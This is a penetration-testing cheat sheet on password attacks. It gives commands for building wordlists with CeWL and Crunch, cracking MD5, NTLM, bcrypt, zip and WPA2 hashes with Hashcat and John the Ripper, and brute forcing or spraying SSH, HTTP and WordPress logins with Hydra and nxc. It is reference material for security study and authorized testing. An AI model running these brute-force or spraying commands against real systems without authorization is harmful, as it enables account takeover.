Passwords

CeWL
Spider sites to generate custom wordlists.

# Crawl depth 7, min word length 8, include numbers
cewl -d 7 -m 8 --with-numbers -w cewl.lst http://targeturl.com
 
# Include email addresses
cewl -e http://targeturl.com -w cewl_words.txt --email_file emails.txt
 
# Allow spidering offsite links
cewl --offsite -w full.lst http://targeturl.com

---

Crunch
Generate brute-force-style wordlists.

# Basic character set, 6–8 character words
crunch 6 8 abc123 -o custom.lst
 
# All lowercase 8-character words
crunch 8 8 abcdefghijklmnopqrstuvwxyz -o lowercase8.txt
 
# Add fixed prefix or suffix pattern
crunch 6 6 -t admin@@ -o adminlist.txt
 
# Pipe directly into tool (no file written)
crunch 4 4 0123456789 | hydra -l admin -P - ftp://target
 
# Structured patterns
crunch 5 5 -t @@123 -o patterns.txt

---

Hashcat
Rule-based and GPU-accelerated cracking.

# Create a new wordlist using rules
hashcat -r /usr/share/hashcat/rules/best64.rule --stdout base.lst > passlist.txt
 
# Crack bcrypt
hashcat -m 3200 hashes.txt passlist.txt
 
# Crack MD5
hashcat -a 0 -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
 
# Crack NTLM
hashcat -a 0 -m 1000 ntlm.hashes password.lst -o cracked.txt
 
# Potfile default: ~/.hashcat/hashcat.potfile
# Force output to file: -o cracked.txt
 
# Show previously cracked results
hashcat --show -m [mode] hashes.txt

---

John the Ripper
Flexible CPU-based cracking.

# MD5 cracking
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 hashes.txt
 
# Monitor progress
john --status

zip2john

zip2john protected.zip > ziphash.txt

---

Hydra
Online brute-forcing.

# SSH brute force
hydra -l username -P passwords.txt 192.168.1.1 ssh
 
# HTTP GET brute
hydra -V -l admin -P passwords.txt -t 36 -f -s 80 192.168.1.1 http-get /
 
# WordPress POST form
hydra -L users.txt -P passwords.txt target http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In:S=Location' -V

Password spraying with nxc

nxc ssh targets.txt -u [username] -p [password123]

---

WiFi Cracking

Hashcat

# WPA2 Handshake (hccapx)
hashcat -m 2500 handshake.hccapx /usr/share/wordlists/rockyou.txt
 
# WPA2 PMKID (modern format)
hashcat -m 16800 pmkid.16800 /usr/share/wordlists/rockyou.txt
 
# Apply rules
hashcat -m 16800 pmkid.16800 /usr/share/wordlists/rockyou.txt -r rules/best64.rule

John the Ripper

# WPA2 handshake conversion
wpapcap2john capture.cap > handshake.john
john --wordlist=/usr/share/wordlists/rockyou.txt handshake.john

Notes:

• hcxpcapngtool can convert .pcap to .16800
• PMKID does not require active clients

---

Hash Identification Tools

# Command line tools
hashid hash.txt
hash-identifier  # interactive menu

• Online: https://hashes.com/en/tools/hash_identifier

---

Popular Hashcat Modes

  0     = MD5
  500   = md5crypt
  1000  = NTLM
  3200  = bcrypt
  1800  = sha512crypt
  16800 = WPA-PMKID
  22000 = WPA-PBKDF2 (hccapx/pcapng)

---

Wordlist Analysis & Enhancement

# Analyze password strength patterns
pipal wordlist.txt
 
# Generate permutations from names, keywords
rsmangler -f names.txt -x -l -c > mangled.lst

---

References

Wordlists:

• https://wiki.skullsecurity.org/Passwords
• https://github.com/danielmiessler/SecLists/tree/master/Passwords

Other Links:

• https://hashcat.net/wiki/doku.php?id=example_hashes
• https://github.com/digininja/pipal

---

https://www.blackhillsinfosec.com/wp-content/uploads/2020/09/HashcatCheatSheet.v2018.1b.pdf